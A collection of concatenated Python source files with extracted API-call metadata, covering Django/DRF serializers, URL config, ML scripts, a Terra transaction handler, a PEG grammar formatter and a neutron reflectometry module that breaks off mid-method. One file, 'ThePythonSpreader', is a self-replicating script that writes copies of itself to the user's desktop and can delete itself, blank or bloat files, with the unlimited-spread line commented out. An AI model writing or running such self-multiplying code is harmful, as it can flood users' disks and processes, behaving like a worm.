# Determine the serializer field class and keyword arguments.
field_class, field_kwargs = self.parent.build_field(
self.field_name, info, model, depth
)
# Include any kwargs defined in `Meta.extra_kwargs`
extra_field_kwargs.update(
extra_kwargs.get(self.field_name, {})
)
field_kwargs = self.parent.include_extra_kwargs(
field_kwargs, extra_field_kwargs
)
# Create the serializer field.
return field_class(**field_kwargs)
def bind(self, field_name, parent):
super().bind(field_name, parent)
self.read_field.bind(field_name, parent)
if self.write_field is builtin_field:
self.write_field = self._build_field()
self.write_field.bind(field_name, parent)
class WriteListSerializeFriendlyRecursiveField(RecursiveField):
@property
def proxied(self):
self._proxied = super().proxied
if (self._proxied and not self._proxied.context and self.bind_args[1] and self.bind_args[1].context):
self._proxied.context = self.bind_args[1].context
return self._proxied
class CommaSeparatedExportField(serializers.Field):
export_attr = None
def __init__(self, *args, **kwargs):
self.export_attr = kwargs.pop('export_attr', None)
super().__init__(*args, **kwargs)
def get_attribute(self, instance):
try:
return get_attribute_smart(instance, self.source_attrs)
except (KeyError, AttributeError) as exc:
if not self.required and self.default is empty:
raise SkipField()
msg = (
'Got {exc_type} when attempting to get a value for field '
'`{field}` on serializer `{serializer}`.\nThe serializer '
'field might be named incorrectly and not match '
'any attribute or key on the `{instance}` instance.\n'
'Original exception text was: {exc}.'.format(
exc_type=type(exc).__name__,
field=self.field_name,
serializer=self.parent.__class__.__name__,
instance=instance.__class__.__name__,
exc=exc
)
)
raise type(exc)(msg)
def to_representation(self, value):
value = set(value)
if self.export_attr:
value = [get_attribute_smart(item, self.export_attr) for item in value]
return ', '.join([str(item) for item in value if item])
class DynamicChoicesField(serializers.ChoiceField):
def __init__(self, *args, **kwargs):
self._current_choices = {}
super().__init__(*args, **kwargs)
@property
def choices(self):
return self._current_choices
@choices.setter
def choices(self, value):
self._current_choices = value
@property
def choice_strings_to_values(self):
if isinstance(self.choices, Choices):
return {k: v for k, v in self.choices}
return {
str(key): key for key in self.choices.keys()
}
@choice_strings_to_values.setter
def choice_strings_to_values(self, value):
# no need to do here anything
return
class FunctionRelatedField(serializers.RelatedField):
def __init__(self, callable_function=None, **kwargs):
assert callable_function is not None, 'The `callable_function` argument is required.'
self.callable_function = callable_function
super().__init__(**kwargs)
def to_representation(self, obj):
return self.callable_function(obj)
|
[
"unicef_restlib.utils.get_attribute_smart",
"rest_framework.utils.model_meta.get_field_info",
"rest_framework.fields.SkipField",
"django.utils.translation.gettext_lazy"
] |
[((530, 589), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid option "{pk_value}" - option is not available."""'], {}), '(\'Invalid option "{pk_value}" - option is not available.\')\n', (531, 589), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2829, 2861), 'rest_framework.utils.model_meta.get_field_info', 'model_meta.get_field_info', (['model'], {}), '(model)\n', (2854, 2861), False, 'from rest_framework.utils import model_meta\n'), ((4799, 4847), 'unicef_restlib.utils.get_attribute_smart', 'get_attribute_smart', (['instance', 'self.source_attrs'], {}), '(instance, self.source_attrs)\n', (4818, 4847), False, 'from unicef_restlib.utils import get_attribute_smart\n'), ((2372, 2383), 'rest_framework.fields.SkipField', 'SkipField', ([], {}), '()\n', (2381, 2383), False, 'from rest_framework.fields import empty, Field, SkipField\n'), ((5786, 5829), 'unicef_restlib.utils.get_attribute_smart', 'get_attribute_smart', (['item', 'self.export_attr'], {}), '(item, self.export_attr)\n', (5805, 5829), False, 'from unicef_restlib.utils import get_attribute_smart\n'), ((4980, 4991), 'rest_framework.fields.SkipField', 'SkipField', ([], {}), '()\n', (4989, 4991), False, 'from rest_framework.fields import empty, Field, SkipField\n')]
|
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from django.views.generic import TemplateView
cyborg_patterns = [
url(
r'^robots\.txt$',
TemplateView.as_view(
template_name='cyborg/robots.txt',
content_type='text/plain'
),
name='robots'
),
url(
r'^humans\.txt$',
TemplateView.as_view(
template_name='cyborg/humans.txt',
content_type='text/plain'
),
name='humans'
),
]
urlpatterns = [
url(r'', include(cyborg_patterns, namespace='cyborg'))
]
|
[
"django.views.generic.TemplateView.as_view",
"django.conf.urls.include"
] |
[((176, 263), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""cyborg/robots.txt"""', 'content_type': '"""text/plain"""'}), "(template_name='cyborg/robots.txt', content_type=\n 'text/plain')\n", (196, 263), False, 'from django.views.generic import TemplateView\n'), ((366, 453), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""cyborg/humans.txt"""', 'content_type': '"""text/plain"""'}), "(template_name='cyborg/humans.txt', content_type=\n 'text/plain')\n", (386, 453), False, 'from django.views.generic import TemplateView\n'), ((545, 589), 'django.conf.urls.include', 'include', (['cyborg_patterns'], {'namespace': '"""cyborg"""'}), "(cyborg_patterns, namespace='cyborg')\n", (552, 589), False, 'from django.conf.urls import url, include\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Code by: @53686b (Github/Twitter)
# Version: 1.0.1 (23/03/2021)
"""
ThePythonSpreader is a script that creates files capable of multiplying themselves.
The first file copies itself to a new file, which results of the addition of a random number
to the original file name, and then executes it. Each new file will repeat the same pattern
indefinetely.
Some customization is allowed through the settings found between lines 40 and 89.
For safety reasons the self-multiplying behavior of each copy is deactivated by default.
To activate it, check line 172.
Make sure to use it only in a safe environment, such as a disposable Virtual Machine.
*** Full responsibility for any damage caused by this script goes to the user. ***
"""
############################################################################################
###### ## ## ####### # ## ## ## ## ## # #######
###### ### # ## ###### #### ### # ### # ##### ### # ### # ##### ### ######
###### ### ######## ## ## ## # # ### # # #######
###### ######## ########### # ###### ## ## ##### ### # ### # ##### ## #######
###### ######## ### ## ## ###### ### # # ### # ## # ### ######
############################################################################################
import os
from getpass import getuser
from random import randrange
user = getuser()
############################################################################################
########################## Default Settings ##########################
############################################################################################
name , safetyDelay , randomRange = 'Spreader' , 1 , 10
# name - Name of the file.
# safetyDelay - Time it takes to create a new file. (float, seconds)
# randomRange - amount of file each new one creates.
############################################################################################
# Choose the directory where you want to create the spreader file. Must be a string.
# (Default = "c:\\Users\\" + user + "\\desktop\\")
targetDirectory = "c:\\Users\\" + user + "\\desktop\\"
############################################################################################
######################### Advanced Settings ##########################
############################################################################################
# Choose if you want to create a ReadMe file in the targetted directory.
ReadMe = False
txt = "This is a message"
############################################################################################
######### KeepSelf 0 ### DeleteContent 1 ### TurnIntoGarbage 2 ### DeleteSelf 3 #########
############################################################################################
# Choose from above, the kind of behaviour each file should have after multiplying.
fileLife = 0
############################################################################################
######################################## Size ########################################
############################################################################################
amountOfGarbage = 1 # (int, kbytes~)
# If you chose the TurnIntoGarbage option.
makeThemExtraHeavy = False
amountOfExtraGarbage = 1 # (int, kbytes~)
# makeThemExtraHeavy - Adds garbage to the files in order to make them heavier.
# This is independent from the TurnIntoGarbage option as it leaves the code alone.
############################################################################################
############################################################################################
############################################################################################
garbage , extraGarbage = "" , ""
if fileLife == 2:
garbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
if makeThemExtraHeavy:
extraGarbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
# Creates the ReadMe file if the option is selected.
if ReadMe:
read = open(targetDirectory + "README" + ".txt" , "w")
read.write(txt)
read.close()
# Creates the first file.
f = open(targetDirectory + name + ".py" , "w")
f.write(
# Adds the configs chosen to the DNA of the the file.
"x = " + "\"" + name + "\"" + "\n"
"y = " + str(safetyDelay) + "\n"
"z = " + str(randomRange) + "\n"
"v = " + str(fileLife) + "\n"
"t = '''" + garbage + "'''\n"
# Adds the reproductive DNA to the file.
"""
import os
from time import sleep
from random import randrange
from shutil import copyfile
i = randrange(z)
nL = len(x)
os.path.basename(__file__)
nNS = (os.path.basename(__file__)[nL:])[:-3] + str(i)
s = __file__
d = os.path.join(os.path.dirname(__file__), x + nNS + '.py')
copyfile(s, d)
sleep(y)
k = []
for g in os.listdir(os.path.abspath(os.path.dirname(__file__))):
for n in range(0,z):
if g == (os.path.basename(__file__)[:-3] + str(n) + ".py"):
k.append(g)
if v == 0 and len(k) == z:
exec(open(__file__).read())
elif v == 1 and len(k) == z:
f = open(__file__ , "w")
f.write("")
f.close
elif v == 2 and len(k) == z:
f = open(__file__ , "w")
f.write(t)
f.close
elif v == 3 and len(k) == z:
os.remove(__file__)
else:
exec(open(__file__).read())\n"""
############################################################################################
############ The Line Below Will Make The Program Spread Without Limits ############
############################################################################################
""" #os.system(os.path.dirname(__file__), name + nNS + '.py')"""
############################################################################################
########################## !Delete the '#' at own risk! ############################
############################################################################################
# Makes the file heavier if the option is selected.
+ "\n" + amountOfExtraGarbage * extraGarbage)
f.close()
#This executes the first file.
#os.system(targetDirectory + name + ".py")
############################################################################################
############################################################################################
############################################################################################
|
[
"getpass.getuser"
] |
[((1507, 1516), 'getpass.getuser', 'getuser', ([], {}), '()\n', (1514, 1516), False, 'from getpass import getuser\n')]
|
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from shared_utilities import find_linearReg_optimal_test_size
from shared_utilities import plot_linear_reg
from shared_utilities import check_outlier
from shared_utilities import plot_scatter
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
if __name__ == '__main__':
df = pd.read_csv('Real estate.csv')
X = df.iloc[:, 1:-1]
y = df.iloc[:, -1]
plot_scatter(X.iloc[:, 2], y, 'scatter.png')
# Scale X
sc = StandardScaler()
X_scaled = sc.fit_transform(X)
f = open("values.txt", "a")
f.write(str(X))
f.close()
raise Exception()
# PCA for feature reduction
pca = PCA(n_components='mle', svd_solver='full', random_state=42)
X_pca = pca.fit_transform(X_scaled)
print(X_pca.min(), X_pca.max())
test_size = find_linearReg_optimal_test_size(X, y)
X_train, X_test, y_train, y_test = train_test_split(X_pca, y, test_size=test_size, random_state=42)
mdl = LinearRegression().fit(X_train, y_train)
y_pred = mdl.predict(X_test)
score = r2_score(y_test, y_pred)
# plot_linear_reg('linear_reg.png', y_pred, X_test.iloc[:, 2], y_test)
|
[
"shared_utilities.plot_scatter",
"sklearn.preprocessing.StandardScaler",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.metrics.r2_score",
"sklearn.linear_model.LinearRegression",
"sklearn.decomposition.PCA",
"shared_utilities.find_linearReg_optimal_test_size"
] |
[((495, 525), 'pandas.read_csv', 'pd.read_csv', (['"""Real estate.csv"""'], {}), "('Real estate.csv')\n", (506, 525), True, 'import pandas as pd\n'), ((580, 624), 'shared_utilities.plot_scatter', 'plot_scatter', (['X.iloc[:, 2]', 'y', '"""scatter.png"""'], {}), "(X.iloc[:, 2], y, 'scatter.png')\n", (592, 624), False, 'from shared_utilities import plot_scatter\n'), ((649, 665), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (663, 665), False, 'from sklearn.preprocessing import StandardScaler\n'), ((833, 892), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '"""mle"""', 'svd_solver': '"""full"""', 'random_state': '(42)'}), "(n_components='mle', svd_solver='full', random_state=42)\n", (836, 892), False, 'from sklearn.decomposition import PCA\n'), ((985, 1023), 'shared_utilities.find_linearReg_optimal_test_size', 'find_linearReg_optimal_test_size', (['X', 'y'], {}), '(X, y)\n', (1017, 1023), False, 'from shared_utilities import find_linearReg_optimal_test_size\n'), ((1063, 1127), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_pca', 'y'], {'test_size': 'test_size', 'random_state': '(42)'}), '(X_pca, y, test_size=test_size, random_state=42)\n', (1079, 1127), False, 'from sklearn.model_selection import train_test_split\n'), ((1225, 1249), 'sklearn.metrics.r2_score', 'r2_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1233, 1249), False, 'from sklearn.metrics import r2_score\n'), ((1139, 1157), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (1155, 1157), False, 'from sklearn.linear_model import LinearRegression\n')]
|
import pandas as pd
import torch
import torch.nn as nn
from transformers.modeling_outputs import SequenceClassifierOutputWithPast
from ..src.model.hart import HaRTPreTrainedModel
class ArHulmForSequenceClassification(HaRTPreTrainedModel):
# _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head\.weight"]
def __init__(self, config, output_dir, agg_type, arhulm=None):
super().__init__(config)
self.num_labels = config.num_labels
self.use_history_output = config.use_history_output
self.score = nn.Linear(config.n_embd, self.num_labels, bias=False)
self.output_dir = output_dir
self.agg_type = agg_type
if arhulm:
self.transformer = arhulm
else:
self.transformer = HaRTPreTrainedModel(config)
self.init_weights()
# Model parallel
self.model_parallel = False
self.device_map = None
def forward(
self,
input_ids=None,
user_ids=None,
history=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
history=history,
output_block_last_hidden_states=True,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
users = pd.DataFrame(user_ids.cpu().detach().numpy(), columns=['user_id'])
users = users.loc[users.index.repeat(768)]
users.reset_index(drop=True, inplace=True)
if self.agg_type=='last':
user_states = transformer_outputs.history[0][-1]
elif self.agg_type=='sum':
all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
user_states = torch.sum(all_blocks_user_states, dim=1)
elif self.agg_type=='avg':
all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
user_states = torch.sum(all_blocks_user_states, dim=1)/all_blocks_user_states.shape[1]
elif self.agg_type=='masked_last':
states = transformer_outputs.history[0]
masks = transformer_outputs.history[1]
multiplied = tuple(l * r for l, r in zip(states, masks))
all_blocks_user_states = torch.stack(multiplied, dim=1).cpu().detach()
all_blocks_masks = torch.stack(masks, dim=1)
divisor = torch.sum(all_blocks_masks, dim=1).cpu().detach()
user_states = all_blocks_user_states[range(all_blocks_user_states.shape[0]), divisor.squeeze()-1]
elif self.agg_type=='masked_sum':
states = transformer_outputs.history[0]
masks = transformer_outputs.history[1]
multiplied = tuple(l * r for l, r in zip(states, masks))
all_blocks_user_states = torch.stack(multiplied, dim=1)
user_states = torch.sum(all_blocks_user_states, dim=1)
elif self.agg_type=='masked_avg':
states = transformer_outputs.history[0]
masks = transformer_outputs.history[1]
multiplied = tuple(l * r for l, r in zip(states, masks))
all_blocks_user_states = torch.stack(multiplied, dim=1)
all_blocks_masks = torch.stack(masks, dim=1)
sum = torch.sum(all_blocks_user_states, dim=1)
divisor = torch.sum(all_blocks_masks, dim=1)
user_states = sum/divisor
logits = user_states
loss = torch.Tensor([0.1]).cuda()
user_states = pd.DataFrame(user_states.cpu().detach().numpy())
user_states = user_states.stack().reset_index()
user_states['level_0'] = users['user_id']
user_states.rename(columns={'level_0':'user_id','level_1': 'column_number', 0:'value'}, inplace=True)
user_states.to_csv(self.output_dir + '/test_states_' + str(user_ids[0].item()) + '.csv', index=False)
return SequenceClassifierOutputWithPast(
loss=loss,
logits=logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
|
[
"torch.stack",
"torch.nn.Linear",
"torch.Tensor",
"transformers.modeling_outputs.SequenceClassifierOutputWithPast",
"torch.sum"
] |
[((559, 612), 'torch.nn.Linear', 'nn.Linear', (['config.n_embd', 'self.num_labels'], {'bias': '(False)'}), '(config.n_embd, self.num_labels, bias=False)\n', (568, 612), True, 'import torch.nn as nn\n'), ((5028, 5241), 'transformers.modeling_outputs.SequenceClassifierOutputWithPast', 'SequenceClassifierOutputWithPast', ([], {'loss': 'loss', 'logits': 'logits', 'past_key_values': 'transformer_outputs.past_key_values', 'hidden_states': 'transformer_outputs.hidden_states', 'attentions': 'transformer_outputs.attentions'}), '(loss=loss, logits=logits, past_key_values=\n transformer_outputs.past_key_values, hidden_states=transformer_outputs.\n hidden_states, attentions=transformer_outputs.attentions)\n', (5060, 5241), False, 'from transformers.modeling_outputs import SequenceClassifierOutputWithPast\n'), ((2824, 2874), 'torch.stack', 'torch.stack', (['transformer_outputs.history[0]'], {'dim': '(1)'}), '(transformer_outputs.history[0], dim=1)\n', (2835, 2874), False, 'import torch\n'), ((2901, 2941), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (2910, 2941), False, 'import torch\n'), ((4587, 4606), 'torch.Tensor', 'torch.Tensor', (['[0.1]'], {}), '([0.1])\n', (4599, 4606), False, 'import torch\n'), ((3014, 3064), 'torch.stack', 'torch.stack', (['transformer_outputs.history[0]'], {'dim': '(1)'}), '(transformer_outputs.history[0], dim=1)\n', (3025, 3064), False, 'import torch\n'), ((3091, 3131), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (3100, 3131), False, 'import torch\n'), ((3493, 3518), 'torch.stack', 'torch.stack', (['masks'], {'dim': '(1)'}), '(masks, dim=1)\n', (3504, 3518), False, 'import torch\n'), ((3952, 3982), 'torch.stack', 'torch.stack', (['multiplied'], {'dim': '(1)'}), '(multiplied, dim=1)\n', (3963, 3982), False, 'import torch\n'), ((4009, 4049), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (4018, 4049), False, 'import torch\n'), ((4301, 4331), 'torch.stack', 'torch.stack', (['multiplied'], {'dim': '(1)'}), '(multiplied, dim=1)\n', (4312, 4331), False, 'import torch\n'), ((4363, 4388), 'torch.stack', 'torch.stack', (['masks'], {'dim': '(1)'}), '(masks, dim=1)\n', (4374, 4388), False, 'import torch\n'), ((4407, 4447), 'torch.sum', 'torch.sum', (['all_blocks_user_states'], {'dim': '(1)'}), '(all_blocks_user_states, dim=1)\n', (4416, 4447), False, 'import torch\n'), ((4470, 4504), 'torch.sum', 'torch.sum', (['all_blocks_masks'], {'dim': '(1)'}), '(all_blocks_masks, dim=1)\n', (4479, 4504), False, 'import torch\n'), ((3416, 3446), 'torch.stack', 'torch.stack', (['multiplied'], {'dim': '(1)'}), '(multiplied, dim=1)\n', (3427, 3446), False, 'import torch\n'), ((3541, 3575), 'torch.sum', 'torch.sum', (['all_blocks_masks'], {'dim': '(1)'}), '(all_blocks_masks, dim=1)\n', (3550, 3575), False, 'import torch\n')]
|
import logging
from terra import util_terra
from terra.execute_type import (
_execute_type,
)
from .zap import (
handle_zap_into_strategy,
handle_zap_out_of_strategy,
)
def handle(exporter, elem, txinfo, index):
execute_msg = util_terra._execute_msg(elem, index)
if "send" in execute_msg:
msg = execute_msg["send"]["msg"]
# Apollo
if "zap_into_strategy" in msg:
return handle_zap_into_strategy(exporter, elem, txinfo)
if "zap_out_of_strategy" in msg:
return handle_zap_out_of_strategy(exporter, elem, txinfo)
execute_type = _execute_type(elem, txinfo, index)
logging.info("[apollo] General transaction type=%s txid=%s", execute_type, elem["txhash"])
return execute_type
|
[
"logging.info",
"terra.util_terra._execute_msg",
"terra.execute_type._execute_type"
] |
[((243, 279), 'terra.util_terra._execute_msg', 'util_terra._execute_msg', (['elem', 'index'], {}), '(elem, index)\n', (266, 279), False, 'from terra import util_terra\n'), ((617, 651), 'terra.execute_type._execute_type', '_execute_type', (['elem', 'txinfo', 'index'], {}), '(elem, txinfo, index)\n', (630, 651), False, 'from terra.execute_type import _execute_type\n'), ((656, 750), 'logging.info', 'logging.info', (['"""[apollo] General transaction type=%s txid=%s"""', 'execute_type', "elem['txhash']"], {}), "('[apollo] General transaction type=%s txid=%s', execute_type,\n elem['txhash'])\n", (668, 750), False, 'import logging\n')]
|
"""
Developed by: <NAME> (2018)
This script rename all files in the specified directory to lowercase and then replace all white space with hyphen (-).
"""
import os
import sys
import glob
import argparse
# Print welcome message
print("\nDeveloped by: <NAME> (2018)\n"
"This script rename all files in the specified directory to lowercase.\n"
"and then replace all white space with hyphen (-).\n")
# Set up the argument variables
parser = argparse.ArgumentParser()
parser.add_argument("working_directory", help="Path to a working directory")
args = parser.parse_args()
working_directory = args.working_directory
# Get the iterator in case file list is so large
file_list = glob.iglob(os.path.join(working_directory, '*'))
print("Beginning the process...")
for f in file_list:
# Don't process a directory
if os.path.isdir(f):
continue
# Get only filename
filename = os.path.basename(f)
# Split filename and extension
filename_split = os.path.splitext(filename)
# Change to filename lowercase and replace whitespace with hyphen then concat with extension again
new_f = os.path.join(working_directory, filename_split[0].replace(" ", "-").lower() + filename_split[1])
# Rename old file name to new file name
os.renames(f, new_f)
# Print feedback to user
print("'" + f + "' has been renamed.")
print("Process finished successfully.\n")
|
[
"argparse.ArgumentParser",
"os.path.basename",
"os.path.isdir",
"os.path.splitext",
"os.renames",
"os.path.join"
] |
[((453, 478), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (476, 478), False, 'import argparse\n'), ((699, 735), 'os.path.join', 'os.path.join', (['working_directory', '"""*"""'], {}), "(working_directory, '*')\n", (711, 735), False, 'import os\n'), ((832, 848), 'os.path.isdir', 'os.path.isdir', (['f'], {}), '(f)\n', (845, 848), False, 'import os\n'), ((906, 925), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (922, 925), False, 'import os\n'), ((982, 1008), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (998, 1008), False, 'import os\n'), ((1269, 1289), 'os.renames', 'os.renames', (['f', 'new_f'], {}), '(f, new_f)\n', (1279, 1289), False, 'import os\n')]
|
from typing import Dict, Tuple, Callable, Any
from pe._constants import Operator
from pe._errors import Error
from pe._escape import escape
DOT = Operator.DOT
LIT = Operator.LIT
CLS = Operator.CLS
RGX = Operator.RGX
SYM = Operator.SYM
OPT = Operator.OPT
STR = Operator.STR
PLS = Operator.PLS
AND = Operator.AND
NOT = Operator.NOT
CAP = Operator.CAP
BND = Operator.BND
SEQ = Operator.SEQ
CHC = Operator.CHC
RUL = Operator.RUL
DEF = Operator.DEF
DBG = Operator.DBG
class Definition:
"""An abstract definition of a parsing expression."""
__slots__ = 'op', 'args',
def __init__(self, op: Operator, args: Tuple[Any, ...]):
self.op = op
self.args = args
def __repr__(self):
return f'({self.op}, {self.args!r})'
def __str__(self):
return _format(self, None)
def __eq__(self, other: object):
if not isinstance(other, Definition):
return NotImplemented
return (self.op == other.op
and self.args == other.args)
def format(self) -> str:
return _format(self, DEF)
def _format_dot(defn: Definition, prev_op: Operator) -> str:
return '.'
def _format_literal(defn: Definition, prev_op: Operator) -> str:
return f'''"{escape(defn.args[0], ignore="'[]")}"'''
def _format_class(defn: Definition, prev_op: Operator) -> str:
def esc(s):
return escape(s, ignore='"\'')
clsstr = ''.join(f'{esc(a)}-{esc(b)}' if b else esc(a)
for a, b in defn.args[0])
if defn.args[1]:
return f'''(![{clsstr}] .)'''
else:
return f'''[{clsstr}]'''
def _format_regex(defn: Definition, prev_op: Operator) -> str:
return f'`{defn.args[0]}`' # temporary syntax
def _format_nonterminal(defn: Definition, prev_op: Operator) -> str:
return defn.args[0]
_format_decorators: Dict[Operator, Tuple[str, str, str]] = {
OPT: ('', '', '?'),
STR: ('', '', '*'),
PLS: ('', '', '+'),
AND: ('&', '', ''),
NOT: ('!', '', ''),
CAP: ('~', '', ''),
BND: ('{}:', '', ''),
SEQ: ('', ' ', ''),
CHC: ('', ' / ', ''),
RUL: ('', '', ' -> {}'),
}
def _format_recursive(defn: Definition, prev_op: Operator) -> str:
op = defn.op
args = defn.args
prefix, delimiter, suffix = _format_decorators[op]
fmt = '({})' if prev_op and op.precedence <= prev_op.precedence else '{}'
if delimiter:
body = delimiter.join(_format(d, op) for d in args[0])
else:
body = _format(args[0], op)
body = body.replace('{', '{{').replace('}', '}}')
return fmt.format((prefix + body + suffix).format(*args[1:]))
def _format_debug(defn: Definition, prev_op: Operator) -> str:
return _format(defn.args[0], prev_op)
_Formatter = Callable[[Definition, Operator], str]
_format_map: Dict[Operator, _Formatter] = {
DOT: _format_dot,
LIT: _format_literal,
CLS: _format_class,
RGX: _format_regex,
SYM: _format_nonterminal,
OPT: _format_recursive,
STR: _format_recursive,
PLS: _format_recursive,
AND: _format_recursive,
NOT: _format_recursive,
CAP: _format_recursive,
BND: _format_recursive,
SEQ: _format_recursive,
CHC: _format_recursive,
RUL: _format_recursive,
DBG: _format_debug,
}
def _format(defn: Definition,
prev_op: Operator) -> str:
try:
func = _format_map[defn.op]
except KeyError:
raise Error(f'invalid operation: {defn.op!r}')
return func(defn, prev_op)
|
[
"pe._escape.escape",
"pe._errors.Error"
] |
[((1374, 1397), 'pe._escape.escape', 'escape', (['s'], {'ignore': '""""\'"""'}), '(s, ignore=\'"\\\'\')\n', (1380, 1397), False, 'from pe._escape import escape\n'), ((1237, 1271), 'pe._escape.escape', 'escape', (['defn.args[0]'], {'ignore': '"""\'[]"""'}), '(defn.args[0], ignore="\'[]")\n', (1243, 1271), False, 'from pe._escape import escape\n'), ((3409, 3449), 'pe._errors.Error', 'Error', (['f"""invalid operation: {defn.op!r}"""'], {}), "(f'invalid operation: {defn.op!r}')\n", (3414, 3449), False, 'from pe._errors import Error\n')]
|
import numpy as np
import cmath
from functools import reduce
from math import pi, ceil
from numpy import sin, cos
from scipy.interpolate import interp1d
"""
References:
[Majkrzak2003] <NAME>, <NAME>: Physica B 336 (2003) 27-38
Phase sensitive reflectometry and the unambiguous determination
of scattering length density profiles
"""
def interpolate(x, fx):
return interp1d(x, fx, bounds_error=False, fill_value=0)
def refr_idx(q, sld):
"""
Calculates the refractive index with given SLD [\AA^{-2}] and wavevector transfer q [
\AA^{-1}]. The units can be arbitrary choosen, but they must satisfy that sld/q**2 has
unit [1]. The arguments should not be scaled by any constants.
For example
q = 0.01
sld = 1e-6
The refractive index is complex if q < q_c (being the critical edge) and it is
completely real if q >= q_c.
"""
return cmath.sqrt(1 - 16 * pi * sld / (q ** 2))
def reflection_matrix(q, sld, thickness, as_matrix=False):
"""
Calculates a reflection matrix used for calculating the reflectivity of
a slab of material (sld, thickness) for the wave vector transfer q.
See <NAME>, <NAME>: Physical Review B Vol. 52 Nr 15, 1995:
Exact determination of the phase in neutron reflectometry, Equation (1)
If as_matrix is True, a matrix 2x2 will be returned, if not, then the matrix
indices are returned as a, b, c, d
"""
n = refr_idx(q, sld)
theta = 0.5 * q * n * thickness
a, b, c, d = cos(theta), 1 / n * sin(theta), -n * sin(theta), cos(theta)
if as_matrix:
return np.array([[a, b], [c, d]])
return a, b, c, d
class SLDProfile(object):
def __init__(self):
pass
def as_matrix(self, q):
"""
Returns the matrix coefficients in the abeles formalism.
Returns w, x, y, z corresponding to the matrix [[w, x], [y, z]]
"""
return 0, 0, 0, 0
class ConstantSLDProfile(SLDProfile):
def __init__(self, sld, thickness, sigma=0):
if sld > 15:
raise RuntimeError("SLD seems to be unreasonable high")
self._sld = float(sld)
self._d = float(thickness)
self._r = float(sigma)
if self._r > 0:
raise NotImplementedError("Roughness not implemented yet")
def as_matrix(self, q):
return reflection_matrix(q, self._sld, self._d)
class ConcatSLDProfile(SLDProfile):
"""
The first element in sld_profiles is closest to the substrate
"""
def __init__(self, sld_profiles, reverse=False):
self._slds = sld_profiles
self._reverse = reverse
def as_matrix(self, q):
m = len(self._slds) * [None]
for i in range(0, len(self._slds)):
a, b, c, d = self._slds[i].as_matrix(q)
m[i] = np.array([[a, b], [c, d]])
if self._reverse:
m = list(reversed(m))
m = np.linalg.multi_dot(m)
return m[0][0], m[0][1], m[1][0], m[1][1]
class FunctionSLDProfile(SLDProfile):
def __init__(self, function, support, dx=0.1):
self._f = function
self._supp = support
self._dx = dx
self._xspace = np.linspace(support[0], support[1],
ceil((support[1] - support[0]) * 1 / dx))
self._feval = [self._f(x) for x in self._xspace]
self._m = [ConstantSLDProfile(fx, dx) for fx in self._feval]
self._concat = ConcatSLDProfile(self._m, reverse=False)
def as_matrix(self, q):
return self._concat.as_matrix(q)
class SlabsSLDProfile(SLDProfile):
def __init__(self, z, rho):
self._z = z
self._rho = rho
@classmethod
def from_sample(cls, sample, dz=0.1, dA=1e-4, probe=None):
from refl1d.probe import NeutronProbe
from refl1d.profile import Microslabs
if probe is None:
# The values T and L do not matter for 'just' building the SLD profile
probe = NeutronProbe(T=[1.0], L=[1.0])
slabs = Microslabs(1, dz)
sample.render(probe, slabs)
slabs.finalize(True, dA)
# ignore the imaginary part, this should be zero anyway
z, rho, irho = slabs.smooth_profile(dz)
if any(irho >= 1e-2):
raise RuntimeWarning("Sample contains absorptive SLD (imag >= 1e-2). "
"Reconstruction techniques do not support this.")
# refl1d likes to use SLD * 1e6
return cls(z, rho * 1e-6)
@classmethod
def from_slabs(cls, thickness, sld, roughness, precision=1):
# You should rather use the from_sample method, since its easier to
# understand. This method here is just a kind of 'fallback'
# if you don't wanna have the overhead of building the Stacks in refl1d
# just to put the data in here..
#
# WARNING: from_slabs and from_sample do not create the same slab profile
